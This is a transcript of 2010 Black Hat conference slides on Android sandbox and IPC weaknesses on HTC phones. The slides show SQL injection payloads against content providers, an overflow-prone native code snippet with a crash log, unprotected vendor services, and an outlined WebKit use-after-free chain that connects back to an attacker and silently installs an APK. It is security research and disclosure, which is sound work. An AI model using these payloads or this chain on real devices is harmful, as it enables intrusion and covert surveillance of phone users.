Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010...

64
The Risk you carry in your Pocket Nils Black Hat Abu Dhabi 2010 MWR InfoSecurity

Transcript of Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010...

Page 1: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

The Risk you carry in your Pocket

Nils

Black Hat Abu Dhabi 2010

MWR InfoSecurity

Page 2: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

2

Who Am I?

• Head of Research @ MWR • Exploiting stuff before…

•  Microsoft, Google, Adobe, IBM, Mozilla, Sun, Linux, Apple …

• Pwn2Own Winner 2009 • Safari, IE and Firefox

• Pwn2Own Winner 2010 • Firefox on Windows 7

Page 3: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

• Demo •  Introduction • Android Sandbox • Android IPC • Vulnerabilities • Demo • Conclusion • Q&A

3

Page 4: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

• Demo •  Introduction • Android Sandbox • Android IPC • Vulnerabilities • Demo • Conclusion • Q&A

4

Page 5: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

5

Introduction

•  Prerequisites: •  I have got a WebKit vulnerability

•  Can own: •  iPhone •  Palm Web OS •  Android

•  In Android I am limited to the Sandbox •  Access to Passwords, Cookies, etc…

Page 6: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

6

Introduction

•  I want more Privileges •  Record Audio

Page 7: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

7

Introduction

•  Research on Android Phone • Not emulator • HTC Legend

•  Android 2.1 •  Some apps

Page 8: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

8

What will you see?

• How to: •  Audit a Android Handset •  Additions by Vendors

•  And Carriers •  Audit Android Applications

•  And how to exploit the findings

Page 9: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

9

Android – Previous Research

• Kernel vulnerabilities: • E.g. sock_sendpage()

• Local vulnerabilities: • E.g. adb root vulnerability

• Fork bomb • Setuid return value not checked

Page 10: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

• Demo •  Introduction • Android Sandbox • Android IPC • Vulnerabilities • Demo • Conclusion • Q&A

10

Page 11: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

11

Android – Sandbox

•  Applications are Sandboxed • Using Linux User/Group model •  Every Application == 1 User

•  In theory … •  Communication through IPC •  Permissions

Page 12: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

12

Android – Permissions

•  Applications request Permissions •  AndroidManifest.xml

•  Pre-installed apps •  Set-up by default in phone

• User installed apps • Granted by User during installation •  Limited

Page 13: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

13

Android – Permissions

•  Examples: •  android.permission.CALL_PHONE •  android.permission.RECORD_AUDIO •  android.permission.INSTALL_PACKAGE

Page 14: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

• Demo •  Introduction • Android Sandbox • Android IPC • Vulnerabilities • Demo • Conclusion • Q&A

14

Page 15: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

15

Android – IPC

•  Inter-Process Communication • Used by all of the Apps •  Core feature on Android •  Protected using Permissions

• Mechanism: •  Services •  Content-Providers •  Broadcasts •  Activities

Page 16: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

16

Android – IPC

•  Supported by /dev/binder •  Kernel • Message routing •  Permission enforcement

• Messages in “Parcels” •  Intents special Parcels

Page 17: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

17

Android – Intent

•  Serialised Data Structure •  Sent to IPC endpoints •  Contain Extras

•  Strings •  Primitive Data Types •  Arrays thereof •  Serialisable Java Objects (!)

Page 18: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

18

Android – Service

•  Similar to RPC •  Class extends Service.class

•  Public methods are exported •  Called through Intents

• Defined in AndroidManifest.xml: <service  android:name="BluetoothHeadsetService">                <intent-­‐filter>                            <action  android:name="android.bluetooth.IBluetoothHeadset"  />                </intent-­‐filter>  </service>  

Page 19: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

19

Android – Activity

•  Visual Components of Applications •  Application can instantiate them

•  Sometimes •  Take arguments in Intents • Will run in Implementing Process

•  Permissions!

Page 20: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

20

Android – Content-Providers

•  Provide Access to any Data •  Emails •  Pictures

• Often backed by SQLite Databases •  Content-Resolver • URI: content://browser/bookmarks •  Standard Interface using Cursors • Write and Read Permissions • Not using Intents

Page 21: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

21

Android – Broadcast Receivers

•  Register to Broadcast Messages •  System and Custom

•  Some Messages are protected • Others can be forged by anyone

•  Arguments in Broadcasts •  Intents

•  AndroidManifest.xml •  Can register dynamically as well

Page 22: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

22

Android – Idea

App2

App3

Service1

App1

Service2

Service Content-Provider Broadcast-Receiver Activity

Page 23: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

23

Android – IPC Exports

• Default IPC exports •  Exported by default

•  Content-Providers •  Export depends on set Filters

•  Services •  Broadcast Receivers •  Activities

• Developers aware of that?

Page 24: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

24

Android – Privilege Escalation

•  Any vulnerability in any exported:- •  Service, Content-Provider •  Broadcast Receiver or Activity

•  Can lead to privilege Escalation • Gaining privileges of vulnerable App

Page 25: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

25

Android - Applications

• Many Apps on the phone •  All in different Processes (Theoretically)

• Default Android apps •  ~ 70 apps

•  Vendor apps • HTC: ~ 60 apps •  Plus carrier apps!

• User installed apps • Many more

Page 26: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

26

Android – Processes

•  1 User 1 App • Multiple processes per App • Not on real phones though

•  Shared User Id’s •  Across apps

•  Shared processes •  Across apps

•  => Shared Permissions and Access-rights

Page 27: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

27

Android – Shared UIDs

•  Applications can Share UserIds •  If signed by same Developer Key

• Or Pre-installed •  Pro:

•  Performance •  Contra:

•  Security

Page 28: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

28

Android – Shared UIDs

•  Example: •  com.htc.WeatherWidget

•  Permissions: android.permissions.GET_ACCOUNTS, android.permission.READ_SYNC_SETTINGS

Page 29: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

29

Android – Shared UIDs

•  Example: •  com.htc.WeatherWidget

•  Shares “com.htc.rosie.uid.shared” with: com.htc.FriendStreamWidget, com.htc.TwitterWidget, com.htc.htcmailwidgets, com.htc.NewsReaderWidget, com.htc.StockWidget, com.htc.widget.clockwidget, com.htc.htccalendarwidgets, com.htc.footprints.widgets, com.htc.htccontactwidgets, com.htc.htcmsgwidgets, com.htc.htcsyncwidget, com.htc.launcher, com.htc.WeatherWidget, com.htc.htcsettingwidgets, com.htc.photo.widgets, com.htc.htcbookmarkwidget, com.htc.MusicWidget, com.htc.htcsearchwidgets  

Page 30: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

30

Android – Shared UIDs

•  Example: •  com.htc.WeatherWidget

•  Permissions: android.permissions.GET_ACCOUNTS, android.permission.READ_SYNC_SETTINGS

Page 31: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

31

Android – Shared UIDs

•  Example: •  com.htc.WeatherWidget

•  Shared Permissions: android.permission.INTERNET, com.htc.htctwitter.permission.useprovider, android.permission.ACCESS_FINE_LOCATION, android.permission.ACCESS_NETWORK_STATE, android.permission.ACCESS_WIFI_STATE, android.permission.GET_ACCOUNTS,

android.permission.READ_SYNC_SETTINGS, android.permission.READ_CALENDAR, android.permission.WRITE_CALENDAR,

com.google.android.googleapps.permission.GOOGLE_AUTH.mail, android.permission.READ_CONTACTS,

android.permission.CALL_PHONE, android.permission.CALL_PRIVILEGED, android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, android.permission.RECEIVE_BOOT_COMPLETED, android.permission.WRITE_CONTACTS,

android.permission.RECEIVE_SMS, android.permission.RECEIVE_MMS, android.permission.SEND_SMS, android.permission.VIBRATE, android.permission.WRITE_SMS, android.permission.CHANGE_NETWORK_STATE, android.permission.READ_PHONE_STATE, android.permission.WAKE_LOCK, android.permission.EXPAND_STATUS_BAR, android.permission.GET_TASKS, android.permission.SET_WALLPAPER, android.permission.SET_WALLPAPER_HINTS, android.permission.WRITE_SETTINGS, com.htc.launcher.permission.READ_SETTINGS, com.htc.launcher.permission.WRITE_SETTINGS, android.permission.SET_TIME_ZONE, android.permission.READ_SYNC_STATS, android.permission.WRITE_EXTERNAL_STORAGE, android.permission.BROADCAST_STICKY,

android.permission.WRITE_SECURE_SETTINGS, android.permission.CHANGE_WIFI_STATE, android.permission.CLEAR_APP_USER_DATA, android.permission.MODIFY_PHONE_STATE, android.permission.ACCESS_COARSE_LOCATION, android.permission.WRITE_APN_SETTINGS, android.permission.ACCESS_CHECKIN_PROPERTIES, android.permission.BLUETOOTH, android.permission.BLUETOOTH_ADMIN, android.permission.ACCESS_WIMAX_STATE, android.permission.CHANGE_WIMAX_STATE, android.permission.ACCESS_LOCATION_EXTRA_COMMANDS, android.permission.ACCESS_LOCATION, android.permission.ACCESS_ASSISTED_GPS, android.permission.ACCESS_NETWORK_LOCATION, android.permission.ACCESS_GPS, com.android.browser.permission.READ_HISTORY_BOOKMARKS, com.android.browser.permission.WRITE_HISTORY_BOOKMARKS  

Page 32: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

• Demo •  Introduction • Android Sandbox • Android IPC • Vulnerabilities • Demo • Conclusion • Q&A

32

Page 33: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

33

Android – Vulnerabilities

•  SQL injection in Content Providers • When backed by SQLite

•  Allows for arbitrary reads in databases •  Across processes

•  Can be filtered by Developer • Usually is not • Not encouraged by Dev Docs

• Have not found instances of writes to DB • No useful functions (load_extension()…)

Page 34: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

34

Android – SQL Injection

final Cursor query( Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder);  

Page 35: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

35

Android – SQL Injection

final Cursor query( “content://settings/system”, null, null, null, null);  

SELECT * FROM system;  

Page 36: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

36

Android – SQL Injection

final Cursor query( “content://settings/system”, null, “_id=1”, null, null);  

SELECT * FROM system WHERE _id=1;  

Page 37: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

37

Android – SQL Injection

final Cursor query( “content://settings/system”, null, "(select count(*) from secure where \ name='adb_enabled' and value=’0’)=0”, null, null);  

SELECT * FROM system WHERE "(select count(*) from secure where name='adb_enabled' and value=’0’)=0;  

Page 38: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

38

Android – SQL Injection

final Cursor query( “content://settings/system”, {“_id”}, null, null, null);  

SELECT _id FROM system;  

Page 39: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

39

Android – SQL Injection

final Cursor query( “content://settings/system”, {“ * FROM bluetooth_devices;”}, null, null, null);  

SELECT * FROM bluetooth_devices; FROM system;  

Page 40: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

40

Android – SQL Injection

final Cursor query( “content://settings/system”, {“ * FROM sqlite_master;”}, null, null, null);  

SELECT * FROM sqlite_master; FROM system;  

Page 41: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

41

Android – Vulnerabilities

• Unprotected services •  Example:

•  Introduced by HTC •  com.htc.soundrecorder.RecordingService

• Not protected •  Explicitly exported

•  android.permission.RECORD_AUDIO • Now useless

•  Every HTC Android phone I checked

Page 42: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

42

Android – Native APIs

•  Java less prone to Memory Corruptions • Native APIs more promising for Review •  Services

• Directly exporting native API’s •  Keep a look out for:

•  loadLibrary(“”) •  And “ native “ keyword

Page 43: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

43

Android – Native APIs

char                                mJetFilePath[256];  

int  JetPlayer::loadFromFile(const  char*  path)  {          …          strncpy(mJetFilePath,  path,  strlen(path));  

I/DEBUG      (      31):  pid:  1257,  tid:  1258    >>>  com.example.test1  <<<  I/DEBUG      (      31):  signal  11  (SIGSEGV),  fault  addr  00000000  I/DEBUG      (      31):    r0  ffffffff    r1  41413000    r2  00000004    r3  ffff0ff0  I/DEBUG      (      31):    r4  00000000    r5  41413000    r6  afd40328    r7  00000000  I/DEBUG      (      31):    r8  00100000    r9  80848121    10  10000000    fp  00117808  I/DEBUG      (      31):    ip  afd20209    sp  100ffe20    lr  afd20201    pc  80849aa4    cpsr  80000030  I/DEBUG      (      31):                    #00    pc  00049aa4    /system/lib/libdvm.so  I/DEBUG      (      31):                    #01    lr  afd20201    /system/lib/libc.so  

public  boolean  loadJetFile(String  path)  {                  return  native_loadJetFromFile(path);          }  

Page 44: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

44

Android – Others

•  Let’s be creative •  Applications do all kinds of stuff

•  Some of which is stupid :P

•  Example: Skype - App

#  ls  -­‐al  /data/data/com.skype.raider/files/skypekit  -­‐rwxrwxrwx    1  0    2000    43  /data/data/com.skype.raider/files/skypekit  

Page 45: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

45

Android – Others

•  Permissions: android.permission.DISABLE_KEYGUARD  android.permission.WAKE_LOCK  android.permission.INTERNET  android.permission.GET_ACCOUNTS  android.permission.READ_CONTACTS  android.permission.ACCESS_NETWORK_STATE  android.permission.VIBRATE  android.permission.MODIFY_AUDIO_SETTINGS  android.permission.RECORD_AUDIO  android.permission.READ_PHONE_STATE  android.permission.ACCESS_COARSE_LOCATION  android.permission.GET_TASKS  android.permission.AUTHENTICATE_ACCOUNTS  android.permission.MANAGE_ACCOUNTS  android.permission.READ_SYNC_SETTINGS  android.permission.WRITE_SYNC_SETTINGS  android.permission.GET_ACCOUNTS  android.permission.USE_CREDENTIALS  android.permission.WRITE_SETTINGS  android.permission.WRITE_SECURE_SETTINGS  android.permission.READ_CONTACTS  android.permission.WRITE_CONTACTS  android.permission.READ_SYNC_STATS  android.permission.WRITE_EXTERNAL_STORAGE  

Page 46: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

46

Android – Deserialisation

•  Intents contain Extras •  Can be Serialisable

• Object type is checked after deserialisation •  Arbitrary objects can be deserialised

•  In other Processes •  Across trust boundaries • With other permissions

•  Is this exploitable? •  Sami?

Page 47: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...
Page 48: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

48

Android – Permissions

• Most useful Permission: INSTALL_PACKAGES

• On HTC phones granted to the Browser •  That’s True!

• Why •  Flashlite Flash player •  Installs updates using PackageManager • Needs Permissions for that …

Page 49: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

49

Android – Permissions

•  INSTALL_PACKAGES in Browser •  Impact

• Malicious Code in Browser •  Installs arbitrary Applications

• Without prompting the User • Gains arbitrary Permissions

•  For malicious applications • No restricted permissions

Page 50: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

50

Android – Demo

•  That should be enough…

Demo Time!

Page 51: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

• Demo •  Introduction • Android Sandbox • Android IPC • Vulnerabilities • Demo • Conclusion • Q&A

51

Page 52: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

52

Android Demo - Vulnerability

• Use-after-free in Browser • WebKit

•  Android, Chrome, Safari, iPhone, Symbian, Palm Pre and more

•  Allows for arbitrary code execution • HTML5

•  Introduced in Android 2.0 •  1.5 and 1.6 not vulnerable

•  JavaScript •  Patched in 2.2 • No NX , No ASLR

Page 53: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

53

Android - Use-after-free in Browser

Object 1

Object 2

DOM Object

Page 54: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

54

Android - Use-after-free in Browser

Object 2

FREE

Page 55: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

55

Android - Use-after-free in Browser

Object 2

data data data data data data data data data

Page 56: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

56

Android - Use-after-free in Browser

Object 2

data data data data data data data data data (*data)()

Page 57: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

57

Android - Shellcode

• Steps: • 1. Connect back to Attacker • 2. Upload malicious APK • 3. Install from Browser • 4. Pwnage!

Page 58: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

58

Android - Demo

Page 59: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...
Page 60: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

60

Android Proof-of-Concept

• Reported the vulnerability to vendors • Patched in 2.2

• However • Any WebKit vulnerability will do

• Not patched in most Phones

Page 61: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

• Demo •  Introduction • Android Sandbox • Android IPC • Vulnerabilities • Demo • Conclusion • Q&A

61

Page 62: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

62

Conclusion

• Understand the Threats • Android Sandbox

• Fairly Reasonable • Many bugs introduced by:

• Vendors, Carriers • 3rd Party Apps

• Testing and Assurance • For Phones • Not just OS

Page 63: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

• Demo •  Introduction • Android Sandbox • Android IPC • Vulnerabilities • Demo • Conclusion • Q&A

63

Page 64: Nils Black Hat Abu Dhabi 2010 - Black Hat Briefings · PDF fileNils Black Hat Abu Dhabi 2010 MWR ... android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, ...

64

Questions?